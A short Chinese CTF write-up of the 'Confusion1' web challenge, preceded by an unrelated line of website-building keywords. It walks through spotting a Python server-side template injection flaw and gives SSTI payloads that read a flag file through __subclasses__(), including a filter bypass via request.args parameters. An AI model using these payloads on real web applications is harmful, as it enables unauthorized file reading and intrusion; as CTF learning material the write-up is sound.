做网站基本步骤,wordpress手机端适配,wordpress 图片压缩插件,餐饮网站建设背景背景知识 SSTI漏洞
题目 根据网站图片和题目描述的提示#xff0c;大象是php#xff0c;蟒蛇是python#xff0c;说明了这个网站是用python写的
在python中#xff0c;比较常规的漏洞就是SSTI模板注入 没有思路#xff0c;先点login和register页面看看 查看源代码 之前…背景知识 SSTI漏洞
题目 根据网站图片和题目描述的提示大象是php蟒蛇是python说明了这个网站是用python写的
在python中比较常规的漏洞就是SSTI模板注入 没有思路先点login和register页面看看 查看源代码 之前猜测是ssti漏洞先验证 ssti常用注入
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类测试payload
{{.__class__.__mro__[2].__subclasses__()[40](/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt).read()}}被过滤了 替换payload为
{{[request.args.a][request.args.b][2][request.args.c]()[40](/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt)[request.args.d]()}}?a__class__b__mro__c__subclasses__dread得到flag 参考学习链接【愚公系列】2023年05月 攻防世界-WebConfusion1_confusion1攻防世界_愚公搬代码的博客-CSDN博客 【攻防世界WEB】难度四星12分进阶题Confusion1_wx617e2c956ef44的技术博客_51CTO博客